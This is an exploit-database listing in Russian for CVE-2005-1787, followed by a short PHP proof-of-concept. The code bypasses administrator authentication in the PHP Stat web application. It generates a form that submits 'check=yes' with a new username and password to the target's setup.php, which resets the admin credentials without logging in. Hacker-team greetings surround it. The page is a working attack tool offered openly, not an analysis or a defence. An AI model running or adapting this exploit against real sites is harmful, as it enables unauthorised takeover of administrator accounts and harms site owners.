- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1017
- Проверка EDB
-
- Пройдено
- Автор
- MH_P0RTAL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2005-1787
- Дата публикации
- 2005-05-30
PHP:
<?php
error_reporting(E_PARSE);
/*
================================================================
PHP Stat Administrative User Authentication Bypass POC Exploit
================================================================
====Trap-Set Underground Hacking Team===========mh_p0rtal============
Greetz to : Alpha_programmer , Oil_karchack , Str0ke And Iranian Hacking & Security Teams :
Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
, CrouZ Security Team , Simorgh-ev Security Team ,
====================^^^^^^^^^^^^^^^^^^^-=========================
*/
# Config ________________________________
# address - example: http://www.site.com/setup.php Or www.site.com /dir/setup.php
$url = "http://www.site.com/setup.php";
# EnD ___________________________________
print "<form action=\"$url?check=yes&username=$username&password=$password\" >";
print "<input type=\"hidden\" name=\"check\" value=\"yes\">";
print "Username : <input type=\"text\" name=\"username\" value=\"admin\" size=\"25\"><br>";
print "Password : <input type=\"text\" name=\"password\" value=\"abc123\" size=\"25\"><br>";
print ("<input type=submit value=::Change. > \n");
print "</form>";
//------------------------------------------------------End.
?>
# milw0rm.com [2005-05-30]- Источник
- www.exploit-db.com
